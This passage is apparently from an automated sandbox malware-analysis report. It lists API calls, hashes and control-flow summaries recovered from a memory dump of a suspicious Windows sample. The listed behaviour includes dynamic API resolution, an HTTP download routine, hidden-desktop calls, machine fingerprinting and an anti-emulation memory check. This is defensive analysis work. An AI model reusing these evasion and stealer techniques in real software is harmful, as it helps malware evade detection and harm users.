                            • GetProcAddress.KERNEL32(74DD0000,00BE6290), ref: 00D8684A
                            • GetProcAddress.KERNEL32(74DD0000,00BFD038), ref: 00D86862
                            • GetProcAddress.KERNEL32(74DD0000,00BFD098), ref: 00D8687A
                            • GetProcAddress.KERNEL32(74DD0000,00BEC348), ref: 00D86893
                            • GetProcAddress.KERNEL32(74DD0000,00BE61D0), ref: 00D868AB
                            • GetProcAddress.KERNEL32(74DD0000,00BFD050), ref: 00D868C3
                            • GetProcAddress.KERNEL32(74DD0000,00BFD2C0), ref: 00D868DC
                            • GetProcAddress.KERNEL32(74DD0000,00BFD068), ref: 00D868F4
                            • GetProcAddress.KERNEL32(74DD0000,00BFD080), ref: 00D8690C
                            • GetProcAddress.KERNEL32(74DD0000,00BE62B0), ref: 00D86925
                            • GetProcAddress.KERNEL32(74DD0000,00BFD0F8), ref: 00D8693D
                            • GetProcAddress.KERNEL32(74DD0000,00BFD248), ref: 00D86955
                            • GetProcAddress.KERNEL32(74DD0000,00BFD260), ref: 00D8696E
                            • GetProcAddress.KERNEL32(74DD0000,00BFD0B0), ref: 00D86986
                            • GetProcAddress.KERNEL32(74DD0000,00BFD0C8), ref: 00D8699E
                            • GetProcAddress.KERNEL32(74DD0000,00BFD110), ref: 00D869B7
                            • GetProcAddress.KERNEL32(74DD0000,00BFD170), ref: 00D869CF
                            • GetProcAddress.KERNEL32(74DD0000,00BFD1B8), ref: 00D869E7
                            • GetProcAddress.KERNEL32(74DD0000,00BFD128), ref: 00D86A00
                            • GetProcAddress.KERNEL32(74DD0000,00BFA2E8), ref: 00D86A18
                            • GetProcAddress.KERNEL32(74DD0000,00BFD2D8), ref: 00D86A30
                            • GetProcAddress.KERNEL32(74DD0000,00BFD140), ref: 00D86A49
                            • GetProcAddress.KERNEL32(74DD0000,00BE61F0), ref: 00D86A61
                            • GetProcAddress.KERNEL32(74DD0000,00BFD278), ref: 00D86A79
                            • GetProcAddress.KERNEL32(74DD0000,00BE5CB0), ref: 00D86A92
                            • GetProcAddress.KERNEL32(74DD0000,00BFD200), ref: 00D86AAA
                            • GetProcAddress.KERNEL32(74DD0000,00BFD158), ref: 00D86AC2
                            • GetProcAddress.KERNEL32(74DD0000,00BE5ED0), ref: 00D86ADB
                            • GetProcAddress.KERNEL32(74DD0000,00BE5EF0), ref: 00D86AF3
                            • LoadLibraryA.KERNEL32(00BFD188,00D8051F), ref: 00D86B05
                            • LoadLibraryA.KERNEL32(00BFD218), ref: 00D86B16
                            • LoadLibraryA.KERNEL32(00BFD230), ref: 00D86B28
                            • LoadLibraryA.KERNEL32(00BFD290), ref: 00D86B3A
                            • LoadLibraryA.KERNEL32(00BFD2A8), ref: 00D86B4B
                            • LoadLibraryA.KERNEL32(00BFD1A0), ref: 00D86B5D
                            • LoadLibraryA.KERNEL32(00BFD1D0), ref: 00D86B6F
                            • LoadLibraryA.KERNEL32(00BFD1E8), ref: 00D86B80
                            • GetProcAddress.KERNEL32(75290000,00BE5DF0), ref: 00D86B9C
                            • GetProcAddress.KERNEL32(75290000,00BFD3F8), ref: 00D86BB4
                            • GetProcAddress.KERNEL32(75290000,00BF8CF0), ref: 00D86BCD
                            • GetProcAddress.KERNEL32(75290000,00BFD3B0), ref: 00D86BE5
                            • GetProcAddress.KERNEL32(75290000,00BE5F30), ref: 00D86BFD
                            • GetProcAddress.KERNEL32(734C0000,00BEBD58), ref: 00D86C1D
                            • GetProcAddress.KERNEL32(734C0000,00BE5F10), ref: 00D86C35
                            • GetProcAddress.KERNEL32(734C0000,00BEBF38), ref: 00D86C4E
                            • GetProcAddress.KERNEL32(734C0000,00BFD410), ref: 00D86C66
                            • GetProcAddress.KERNEL32(734C0000,00BFD458), ref: 00D86C7E
                            • GetProcAddress.KERNEL32(734C0000,00BE5F50), ref: 00D86C97
                            • GetProcAddress.KERNEL32(734C0000,00BE5FD0), ref: 00D86CAF
                            • GetProcAddress.KERNEL32(734C0000,00BFD380), ref: 00D86CC7
                            • GetProcAddress.KERNEL32(752C0000,00BE5EB0), ref: 00D86CE3
                            • GetProcAddress.KERNEL32(752C0000,00BE5F70), ref: 00D86CFB
                            • GetProcAddress.KERNEL32(752C0000,00BFD428), ref: 00D86D14
                            • GetProcAddress.KERNEL32(752C0000,00BFD440), ref: 00D86D2C
                            • GetProcAddress.KERNEL32(752C0000,00BE5F90), ref: 00D86D44
                            • GetProcAddress.KERNEL32(74EC0000,00BEBD80), ref: 00D86D64
                            • GetProcAddress.KERNEL32(74EC0000,00BEBFD8), ref: 00D86D7C
                            • GetProcAddress.KERNEL32(74EC0000,00BFD350), ref: 00D86D95
                            • GetProcAddress.KERNEL32(74EC0000,00BE5E10), ref: 00D86DAD
                            • GetProcAddress.KERNEL32(74EC0000,00BE5FB0), ref: 00D86DC5
                            • GetProcAddress.KERNEL32(74EC0000,00BEBF60), ref: 00D86DDE
                            • GetProcAddress.KERNEL32(75BD0000,00BFD368), ref: 00D86DFE
                            • GetProcAddress.KERNEL32(75BD0000,00BE5CD0), ref: 00D86E16
                            • GetProcAddress.KERNEL32(75BD0000,00BF8D00), ref: 00D86E2F
                            • GetProcAddress.KERNEL32(75BD0000,00BFD338), ref: 00D86E47
                            • GetProcAddress.KERNEL32(75BD0000,00BFD4E8), ref: 00D86E5F
                            • GetProcAddress.KERNEL32(75BD0000,00BE5D50), ref: 00D86E78
                            • GetProcAddress.KERNEL32(75BD0000,00BE6030), ref: 00D86E90
                            • GetProcAddress.KERNEL32(75BD0000,00BFD4B8), ref: 00D86EA8
                            • GetProcAddress.KERNEL32(75BD0000,00BFD470), ref: 00D86EC1
                            • GetProcAddress.KERNEL32(75BD0000,CreateDesktopA), ref: 00D86ED7
                            • GetProcAddress.KERNEL32(75BD0000,OpenDesktopA), ref: 00D86EEE
                            • GetProcAddress.KERNEL32(75BD0000,CloseDesktop), ref: 00D86F05
                            • GetProcAddress.KERNEL32(75A70000,00BE5E30), ref: 00D86F21
                            • GetProcAddress.KERNEL32(75A70000,00BFD488), ref: 00D86F39
                            • GetProcAddress.KERNEL32(75A70000,00BFD398), ref: 00D86F52
                            • GetProcAddress.KERNEL32(75A70000,00BFD4D0), ref: 00D86F6A
                            • GetProcAddress.KERNEL32(75A70000,00BFD3E0), ref: 00D86F82
                            • GetProcAddress.KERNEL32(75450000,00BE6010), ref: 00D86F9E
                            • GetProcAddress.KERNEL32(75450000,00BE5D30), ref: 00D86FB6
                            • GetProcAddress.KERNEL32(75DA0000,00BE5FF0), ref: 00D86FD2
                            • GetProcAddress.KERNEL32(75DA0000,00BFD4A0), ref: 00D86FEA
                            • GetProcAddress.KERNEL32(6F070000,00BE6070), ref: 00D8700A
                            • GetProcAddress.KERNEL32(6F070000,00BE6050), ref: 00D87022
                            • GetProcAddress.KERNEL32(6F070000,00BE5E50), ref: 00D8703B
                            • GetProcAddress.KERNEL32(6F070000,00BFD3C8), ref: 00D87053
                            • GetProcAddress.KERNEL32(6F070000,00BE5C90), ref: 00D8706B
                            • GetProcAddress.KERNEL32(6F070000,00BE5CF0), ref: 00D87084
                            • GetProcAddress.KERNEL32(6F070000,00BE5E70), ref: 00D8709C
                            • GetProcAddress.KERNEL32(6F070000,00BE5D10), ref: 00D870B4
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00D870CB
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00D870E2
                            • GetProcAddress.KERNEL32(75AF0000,00BFCE88), ref: 00D870FE
                            • GetProcAddress.KERNEL32(75AF0000,00BF8DB0), ref: 00D87116
                            • GetProcAddress.KERNEL32(75AF0000,00BFCEA0), ref: 00D8712F
                            • GetProcAddress.KERNEL32(75AF0000,00BFCF48), ref: 00D87147
                            • GetProcAddress.KERNEL32(75D90000,00BE5D70), ref: 00D87163
                            • GetProcAddress.KERNEL32(6E240000,00BFCE58), ref: 00D8717F
                            • GetProcAddress.KERNEL32(6E240000,00BE5E90), ref: 00D87197
                            • GetProcAddress.KERNEL32(6E240000,00BFCFA8), ref: 00D871B0
                            • GetProcAddress.KERNEL32(6E240000,00BFCE28), ref: 00D871C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                            • API String ID: 2238633743-3468015613
                            • Opcode ID: 70012f7888d4eac47c91b569a5b32d3db4af485a5c11fbd12ba165cc81921e11
                            • Instruction ID: 5c5a7e0bde8b1d7fc27bbd9cd187866a98c2d20a0386717062c96805ad7ff208
                            • Opcode Fuzzy Hash: 70012f7888d4eac47c91b569a5b32d3db4af485a5c11fbd12ba165cc81921e11
                            • Instruction Fuzzy Hash: E16262B55182089FD764DF78EC88A2637B9F789781301851FE966C3374DBB49852FB20
                            APIs
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D7F1D5
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F1F1
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D7F1FC
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F215
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D7F220
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F239
                            • lstrcpy.KERNEL32(00000000,00D94FA0), ref: 00D7F25E
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F28C
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F2C0
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D7F2F0
                            • lstrlen.KERNEL32(00BE63F0), ref: 00D7F315
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 9c7398eb3e857c7733d7414f0ced6734e637cc4dae74007c280dd96b95dfb69d
                            • Instruction ID: 4edbde69468ca2999fbee764dee6f9f56f6d2a9d5894432150eb7a98befd685c
                            • Opcode Fuzzy Hash: 9c7398eb3e857c7733d7414f0ced6734e637cc4dae74007c280dd96b95dfb69d
                            • Instruction Fuzzy Hash: F2A229709116068FCB20DF69D949A6ABBB5BF48314F19C47AE809DB261EB71DC42CB70
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80013
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D800BD
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D800E1
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D800EC
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80110
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D8011B
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D8013F
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D8015A
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80189
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D80194
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D801C3
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D801CE
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80206
                            • lstrlen.KERNEL32(00D8CFEC), ref: 00D80250
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D80288
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D8059B
                            • lstrlen.KERNEL32(00BE63D0), ref: 00D805AB
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D805D7
                            • lstrcat.KERNEL32(00000000,?), ref: 00D805E3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D8060E
                            • lstrlen.KERNEL32(00BFE060), ref: 00D80625
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D8064C
                            • lstrcat.KERNEL32(00000000,?), ref: 00D80658
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D80681
                            • lstrlen.KERNEL32(00BE60B0), ref: 00D80698
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D806C9
                            • lstrcat.KERNEL32(00000000,?), ref: 00D806D5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D80706
                            • lstrcpy.KERNEL32(00000000,00BF8CE0), ref: 00D8074B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D8077F
                            • lstrcpy.KERNEL32(00000000,00BFE270), ref: 00D807E7
                            • lstrcpy.KERNEL32(00000000,00BF8FD0), ref: 00D80858
                            • lstrcpy.KERNEL32(00000000,fplugins), ref: 00D808CF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D80928
                            • lstrcpy.KERNEL32(00000000,00BF8F90), ref: 00D809F8
                              • Part of subcall function 00D624E0: lstrcpy.KERNEL32(00000000,?), ref: 00D62528
                              • Part of subcall function 00D624E0: lstrcpy.KERNEL32(00000000,?), ref: 00D6254E
                              • Part of subcall function 00D624E0: lstrcpy.KERNEL32(00000000,?), ref: 00D62577
                            • lstrcpy.KERNEL32(00000000,00BF8F70), ref: 00D80ACE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D80B81
                            • lstrcpy.KERNEL32(00000000,00BF8F70), ref: 00D80D58
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID: fplugins
                            • API String ID: 2500673778-38756186
                            • Opcode ID: 8ca3bc61b134e3a8307dd9eb14892a92f9c449535bc129cbd6bcfa8e8d2f9a68
                            • Instruction ID: 2c5bfcb0ee8f38151af9c6295450857ce5c8b6f337dbca8fc6a2f47f69a31201
                            • Opcode Fuzzy Hash: 8ca3bc61b134e3a8307dd9eb14892a92f9c449535bc129cbd6bcfa8e8d2f9a68
                            • Instruction Fuzzy Hash: 3AE26D749053418FD774EF29C489B6ABBE4FF88304F58856EE44D8B252DB31D84ACB62

                            Control-flow Graph (function at 00D66C40): an HTTP GET routine built on WinINet, with blocks calling InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, a loop over InternetReadFile, and InternetCloseHandle on each exit path; executed/not-executed legend and graph edge data omitted
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D66C6F
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D66CC2
                            • InternetOpenA.WININET(00D8CFEC,00000001,00000000,00000000,00000000), ref: 00D66CD5
                            • StrCmpCA.SHLWAPI(?,00BFE7E0), ref: 00D66CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D66D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,00BFE288,00000000,00000000,-00400100,00000000), ref: 00D66D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00D66D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D66D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00D66DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D66DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D66E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00D66E7D
                            • InternetCloseHandle.WININET(00000000), ref: 00D66E8E
                            • InternetCloseHandle.WININET(?), ref: 00D66E98
                            • InternetCloseHandle.WININET(00000000), ref: 00D66EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D66EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: cc7769cf57f84bbb40bad127311603af8c743175d66b21fbc1a578f8f06c6edd
                            • Instruction ID: 7edabdb798e57db75964305c05eee2929b9f92c130105bc5424cf91dfcec9dbf
                            • Opcode Fuzzy Hash: cc7769cf57f84bbb40bad127311603af8c743175d66b21fbc1a578f8f06c6edd
                            • Instruction Fuzzy Hash: 2581C271A41619ABEB20DFA4DC49FAE77B8EF44700F184029F905E7281DB70EE458BB0
                            APIs
                            • lstrlen.KERNEL32(00BE63F0), ref: 00D7F315
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F3A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7F3C7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7F47B
                            • lstrcpy.KERNEL32(00000000,00BE63F0), ref: 00D7F4BB
                            • lstrcpy.KERNEL32(00000000,00BF8D80), ref: 00D7F4EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7F59E
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D7F61C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F64C
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F69A
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00D7F718
                            • lstrlen.KERNEL32(00BF8EA0), ref: 00D7F746
                            • lstrcpy.KERNEL32(00000000,00BF8EA0), ref: 00D7F771
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7F793
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7F7E4
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00D7FA32
                            • lstrlen.KERNEL32(00BF8CD0), ref: 00D7FA60
                            • lstrcpy.KERNEL32(00000000,00BF8CD0), ref: 00D7FA8B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7FAAD
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7FAFE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID: ERROR
                            • API String ID: 367037083-2861137601
                            • Opcode ID: 6e38a281d6e15903fedcc1c3e5472bda6e88cd80dfecb5bf3cad68aa8921a5c1
                            • Instruction ID: a95c26320b2b83aa48d8edd0975696b362b8f89da787d7e9087fb6aca93dda88
                            • Opcode Fuzzy Hash: 6e38a281d6e15903fedcc1c3e5472bda6e88cd80dfecb5bf3cad68aa8921a5c1
                            • Instruction Fuzzy Hash: DCF10670A056068FDB24DF69C894A69B7E5BF48314B2DC4BED80D9B2A1F771DC42CB60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitProcess
                            • String ID: block
                            • API String ID: 621844428-2199623458
                            • Opcode ID: 2f87ee52bd22f79fd22701ee72fe6f01c9c117cb6d850a99fd3ae9f9f40165fd
                            • Instruction ID: 1d9999ace6aed0d611895148d4d66cc22bac84ef212e9cdaf31dc1746462b3db
                            • Opcode Fuzzy Hash: 2f87ee52bd22f79fd22701ee72fe6f01c9c117cb6d850a99fd3ae9f9f40165fd
                            • Instruction Fuzzy Hash: 30516C70A847059FCB209F75DC98E2B7BF4BF44704B14881EF48AC2611EBB6E546AB31

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00D8277B
                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00D793B6,00000000,00000000,00000000,00000000), ref: 00D827AC
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D8280F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D82816
                            • wsprintfA.USER32 ref: 00D8283B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                            • String ID: :\$C
                            • API String ID: 2572753744-3309953409
                            • Opcode ID: 14a9a943a3590634cce8e722274ea53c69754470c308c9a38c9a321cdb1020e9
                            • Instruction ID: 7e2972f17cf24aec3cf2b276aae0b6223a6d3749fe0f47e36315ec16a14c8b71
                            • Opcode Fuzzy Hash: 14a9a943a3590634cce8e722274ea53c69754470c308c9a38c9a321cdb1020e9
                            • Instruction Fuzzy Hash: 25316DB19082099FCB14DFB98A859EFBFBCEF59750F10016AE515E7650E2348A408BB1

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00D64BF7
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00D64C01
                            • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00D64C0B
                            • lstrlen.KERNEL32(?,00000000,?), ref: 00D64C1F
                            • InternetCrackUrlA.WININET(?,00000000), ref: 00D64C27
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ??2@$CrackInternetlstrlen
                            • String ID: <
                            • API String ID: 1683549937-4251816714
                            • Opcode ID: 5527672a904ff5a5c3b22f4e306ea96b3fd460cfccc8a6e301362340c6b0ba7a
                            • Instruction ID: 1a0d0c8ed0ae6aa1d172427a8321ea9b7d726f1920a9512e34a1ea5b71229067
                            • Opcode Fuzzy Hash: 5527672a904ff5a5c3b22f4e306ea96b3fd460cfccc8a6e301362340c6b0ba7a
                            • Instruction Fuzzy Hash: B1014071D00218AFDB10DFA8EC45B9EBBB8EB09364F004126F914E7390EB7459058FD4

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D61046
                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D6104D
                            • ExitProcess.KERNEL32 ref: 00D61058
                            • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D6106C
                            • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00D610AB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                            • String ID:
                            • API String ID: 3477276466-0
                            • Opcode ID: 806c9548adbda060f566d1d8e7de4464e25d122f96dafcd1e787b2dc6901c894
                            • Instruction ID: 2b091d34cab3e33a3e244496e204de76159443a250a6a8330a2bc034cc8e4802
                            • Opcode Fuzzy Hash: 806c9548adbda060f566d1d8e7de4464e25d122f96dafcd1e787b2dc6901c894
                            • Instruction Fuzzy Hash: 3701F4757443087BEB204B796C5AF6B77ADA785B05F248019F704E72D0D9B2E9009A64

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7EEC3
                            • StrCmpCA.SHLWAPI(?,ERROR), ref: 00D7EEDE
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 00D7EF3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: ERROR
                            • API String ID: 3722407311-2861137601
                            • Opcode ID: ffa23cbb2ea63295fa798382292ee42bcb872b82c5c534779385d3e1b4a1d196
                            • Instruction ID: 2fe141f219a991b7d31fc71f0a7f5c8a40a459acb39213cca82c09ac2d433427
                            • Opcode Fuzzy Hash: ffa23cbb2ea63295fa798382292ee42bcb872b82c5c534779385d3e1b4a1d196
                            • Instruction Fuzzy Hash: D62136306616059FCB21FFB8DC56AAE77B4EF14304F085569F84ADB652EA70DD048BB0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 803317263-2766056989
                            • Opcode ID: 09b0b08081718a8b4b2c583ae12d7cab27d98d2a992bbade59cc830375f50576
                            • Instruction ID: 06ba3a683e1028d9203254135c5c0ab0421fbc822b04702f697dd310093bc91b
